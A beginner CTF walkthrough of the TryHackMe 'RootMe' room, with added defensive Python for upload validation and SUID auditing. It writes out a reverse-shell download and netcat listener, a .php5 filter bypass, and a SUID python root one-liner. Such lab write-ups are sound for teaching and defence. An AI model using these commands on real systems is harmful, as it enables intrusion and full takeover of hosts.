# RootMe

## [RootMe](https://www.tryhackme.com/room/rrootme)

A CTF for beginners, can you root me?

### Questions

* Scan the machine, how many ports are open?
* What version of Apache is running?
* What is the hidden directory?
* user.txt?
* Search for files with SUID permission, which file is weird?
* root.txt?

## Enumeration

### Nmap

> nmap -sSVC -A -O -vv

```
PORT   STATE SERVICE REASON         VERSION
22/tcp open  ssh     syn-ack ttl 61 OpenSSH 7.6p1 Ubuntu 4ubuntu0.3 (Ubuntu Linux; protocol 2.0)
| ssh-hostkey: 
|   2048 4a:b9:16:08:84:c2:54:48:ba:5c:fd:3f:22:5f:22:14 (RSA)
| ssh-rsa AAAAB3NzaC1yc2EAAAADAQABAAABAQC9irIQxn1jiKNjwLFTFBitstKOcP7gYt7HQsk6kyRQJjlkhHYuIaLTtt1adsWWUhAlMGl+97TsNK93DijTFrjzz4iv1Zwpt2hhSPQG0GibavCBf5GVPb6TitSskqpgGmFAcvyEFv6fLBS7jUzbG50PDgXHPNIn2WUoa2tLPSr23Di3QO9miVT3+TqdvMiphYaz0RUAD/QMLdXipATI5DydoXhtymG7Nb11sVmgZ00DPK+XJ7WB++ndNdzLW9525v4wzkr1vsfUo9rTMo6D6ZeUF8MngQQx5u4pA230IIXMXoRMaWoUgCB6GENFUhzNrUfryL02/EMt5pgfj8G7ojx5
|   256 a9:a6:86:e8:ec:96:c3:f0:03:cd:16:d5:49:73:d0:82 (ECDSA)
|_ecdsa-sha2-nistp256 AAAAE2VjZHNhLXNoYTItbmlzdHAyNTYAAAAIbmlzdHAyNTYAAABBBERAcu0+Tsp5KwMXdhMWEbPcF5JrZzhDTVERXqFstm7WA/5+6JiNmLNSPrqTuMb2ZpJvtL9MPhhCEDu6KZ7q6rI=
80/tcp open  http    syn-ack ttl 61 Apache httpd 2.4.29 ((Ubuntu))
| http-cookie-flags: 
|   /: 
|     PHPSESSID: 
|_      httponly flag not set
| http-methods: 
|_  Supported Methods: GET HEAD POST OPTIONS
|_http-title: HackIT - Home
```

#### Q: Scan the machine, how many ports are open?

> A: 2

#### Q: What version of Apache is running?

> A: 2.4.29

#### Q: What service is running on port 22?

> A: ssh

### Finding directories/files

> gobuster dir -u http://10.10.63.255:80/ -w /usr/share/dirbuster/wordlists/directory-list-2.3-small.txt -t 33 -x html,php,txt

(the IP is different because I continued this writeup on another day)

![](https://user-images.githubusercontent.com/53917092/95799616-9c977c80-0ccb-11eb-8c12-1261b632a434.png)

#### Q: What is the hidden directory?

> A: /panel/

Checking the directory /panel/, we have:

[![image](https://user-images.githubusercontent.com/53917092/95799962-ad94bd80-0ccc-11eb-82b6-bebb559e010c.png)](https://user-images.githubusercontent.com/53917092/95799962-ad94bd80-0ccc-11eb-82b6-bebb559e010c.png)

Let's try to upload a shell.

shell: <https://raw.githubusercontent.com/pentestmonkey/php-reverse-shell/master/php-reverse-shell.php>

> curl <https://raw.githubusercontent.com/pentestmonkey/php-reverse-shell/master/php-reverse-shell.php> -o revs.php

Remember to start a listener on the port configured in the shell before uploading it:

> nc -lvp PORT

[![image](https://user-images.githubusercontent.com/53917092/95800457-c487df80-0ccd-11eb-951b-1fa61fd38181.png)](https://user-images.githubusercontent.com/53917092/95800457-c487df80-0ccd-11eb-951b-1fa61fd38181.png)

"PHP isn't permitted"

The filter refuses the `.php` extension by name, so let's try bypassing it with the ".php5" extension, which PHP handlers commonly execute as well:

> mv revs.php revs.php5

[![image](https://user-images.githubusercontent.com/53917092/95800910-fcdbed80-0cce-11eb-9775-7ede504b29aa.png)](https://user-images.githubusercontent.com/53917092/95800910-fcdbed80-0cce-11eb-9775-7ede504b29aa.png)

It worked.

To run it, click on "veja" ("see"):
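The bypass works because the upload form only refuses the literal `.php` suffix while the web server still hands other PHP extensions to the interpreter. The following Python is an added example, not the box's code: `denylist_allows` is an assumed reconstruction of the behaviour the form shows, and `safe_upload_name` is the allowlist-plus-rename check a defender would use instead, verifying the extension against a fixed set, checking the file's magic bytes, and discarding the user-supplied name entirely.

```python
import os
import secrets
from typing import Optional

# Magic-byte signatures for the image types the upload form is meant to accept
# (constructed allowlist; extend to whatever your application really needs).
MAGIC = {
    "png": [b"\x89PNG\r\n\x1a\n"],
    "jpg": [b"\xff\xd8\xff"],
    "jpeg": [b"\xff\xd8\xff"],
    "gif": [b"GIF87a", b"GIF89a"],
}


def denylist_allows(filename: str) -> bool:
    """Denylist check modelled on the message the form gives ("PHP isn't
    permitted"): only the literal ".php" suffix is refused.  This is an assumed
    reconstruction, not the box's real source.  ".php5", ".phtml" and ".PHP"
    all slip through, which is exactly why the rename to .php5 worked."""
    return not filename.endswith(".php")


def safe_upload_name(filename: str, head: bytes) -> Optional[str]:
    """Hardened variant: allowlist the extension, confirm the content's magic
    bytes agree with it, and return a fresh server-chosen name.  Returns None
    when the upload must be rejected.

    `head` is the first few bytes of the uploaded content."""
    base = os.path.basename(filename)          # drop any path components
    root, dot, ext = base.rpartition(".")
    if not dot or not root:                    # no extension, or name is ".png"
        return None
    ext = ext.lower()                          # ".PNG" and ".png" are the same
    if ext not in MAGIC:                       # allowlist, never a denylist
        return None
    if not any(head.startswith(sig) for sig in MAGIC[ext]):
        return None                            # "cat.png" that is really PHP
    # The stored name never contains user input, so double extensions such as
    # "shell.php.png" cannot reach the filesystem or the web server's handlers.
    return f"{secrets.token_hex(16)}.{ext}"


if __name__ == "__main__":
    # Constructed sample uploads: the reverse shell from the writeup and a PNG.
    print(denylist_allows("revs.php5"))                          # True: bypassed
    print(safe_upload_name("revs.php5", b"<?php "))              # None: rejected
    print(safe_upload_name("cat.png", b"\x89PNG\r\n\x1a\n\x00"))  # random .png
```

Storing the file under a random name also means the attacker never learns a URL they chose themselves; combined with serving uploads from a directory where the PHP handler is disabled, the web server has no path from an upload to code execution.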

![](https://user-images.githubusercontent.com/53917092/95801051-81c70700-0ccf-11eb-9179-d92c4d421c56.png)

It worked, we have a shell.

To get a proper TTY:

> python -c 'import pty;pty.spawn("/bin/bash")'

> Ctrl+Z

> stty raw -echo

> fg

> export TERM=xterm

![image](https://user-images.githubusercontent.com/53917092/95801836-087ce380-0cd2-11eb-9d6a-dfcb6863ae6c.png)

### user.txt

#### Finding

> find / -type f -name user.txt 2>/dev/null

[![image](https://user-images.githubusercontent.com/53917092/95803052-770f7080-0cd5-11eb-8a1d-a00ca7024fa4.png)](https://user-images.githubusercontent.com/53917092/95803052-770f7080-0cd5-11eb-8a1d-a00ca7024fa4.png)

#### Getting

> cat /var/www/user.txt

[![image](https://user-images.githubusercontent.com/53917092/97300372-1e8fb580-1835-11eb-9ff6-1de7305674cf.png)](https://user-images.githubusercontent.com/53917092/97300372-1e8fb580-1835-11eb-9ff6-1de7305674cf.png)

### root.txt / Privilege Escalation

To look for the files with SUID permission we can use the command:

> find / -type f -user root -perm -4000 2>/dev/null

![](https://user-images.githubusercontent.com/53917092/95803488-9ce94500-0cd6-11eb-9d5c-e8822a26ddb7.png)

#### Exploiting the SUID python binary

> python -c "import os;os.setuid(0);os.system('/bin/bash')"

![](https://user-images.githubusercontent.com/53917092/95803893-a7f0a500-0cd7-11eb-9a16-463b7cbc950a.png)
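The `find` command above lists every regular file owned by root with the SUID bit set, and the python step shows why an interpreter in that list is a full root compromise. The Python below is an added example, not part of the writeup: `collect_suid_root` is a pure-Python equivalent of the `find` command, and `audit_suid` compares the result against an expected baseline and flags interpreters, which is the check a defender would run on a golden image or in a periodic host audit. The baseline set and the sample `find` output in `__main__` are constructed for illustration.

```python
import os
import re
import stat
from typing import Dict, Iterable, List, Set

# Programs that must never carry SUID root: each can run arbitrary code as the
# file owner, which is what the `os.setuid(0)` one-liner above exploits.
INTERPRETER_NAMES = {
    "python", "perl", "ruby", "php", "node", "bash", "sh", "dash",
    "vim", "vi", "nano", "find", "env", "awk", "lua",
}

# Typical Ubuntu SUID-root set (constructed baseline; generate your own from a
# clean build of the same image rather than trusting this list).
BASELINE: Set[str] = {
    "/bin/su", "/bin/mount", "/bin/umount", "/bin/ping", "/bin/fusermount",
    "/usr/bin/passwd", "/usr/bin/sudo", "/usr/bin/newgrp", "/usr/bin/chsh",
    "/usr/bin/chfn", "/usr/bin/gpasswd", "/usr/bin/pkexec",
}


def collect_suid_root(root: str = "/") -> List[str]:
    """Pure-Python equivalent of: find / -type f -user root -perm -4000.

    os.walk does not follow symlinks and lstat() reports the link itself, so
    symlinks are skipped just as find's -type f skips them."""
    hits = []
    for dirpath, _dirnames, filenames in os.walk(root):
        for name in filenames:
            path = os.path.join(dirpath, name)
            try:
                st = os.lstat(path)
            except OSError:            # vanished or unreadable, like 2>/dev/null
                continue
            if (stat.S_ISREG(st.st_mode)            # -type f
                    and st.st_uid == 0              # -user root
                    and st.st_mode & stat.S_ISUID):  # -perm -4000
                hits.append(path)
    return sorted(hits)


def _program_name(path: str) -> str:
    """'/usr/bin/python2.7' -> 'python', '/usr/bin/perl5.26.1' -> 'perl'."""
    return re.sub(r"[\d.]+$", "", os.path.basename(path))


def audit_suid(paths: Iterable[str], baseline: Set[str] = BASELINE) -> Dict[str, List[str]]:
    """Split a SUID-root listing into what the baseline does not expect and
    what is an interpreter regardless of baseline membership."""
    unexpected, interpreters = [], []
    for p in paths:
        if p not in baseline:
            unexpected.append(p)
        if _program_name(p) in INTERPRETER_NAMES:
            interpreters.append(p)
    return {"unexpected": sorted(unexpected), "interpreters": sorted(interpreters)}


if __name__ == "__main__":
    # Constructed sample of what the find command on the box might return.
    sample = ["/bin/su", "/usr/bin/passwd", "/usr/bin/python", "/usr/bin/sudo"]
    print(audit_suid(sample))
    # On a real host: print(audit_suid(collect_suid_root()))
```

Anything under `unexpected` deserves a look, but `interpreters` is the list to act on immediately: the fix on this box is simply `chmod u-s` on the binary, and a scheduled run of this audit (or the equivalent `find` line diffed against a saved baseline) catches the bit being set again.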

#### Getting

![](https://user-images.githubusercontent.com/53917092/97299626-fbb0d180-1833-11eb-8160-946f299c1725.png)
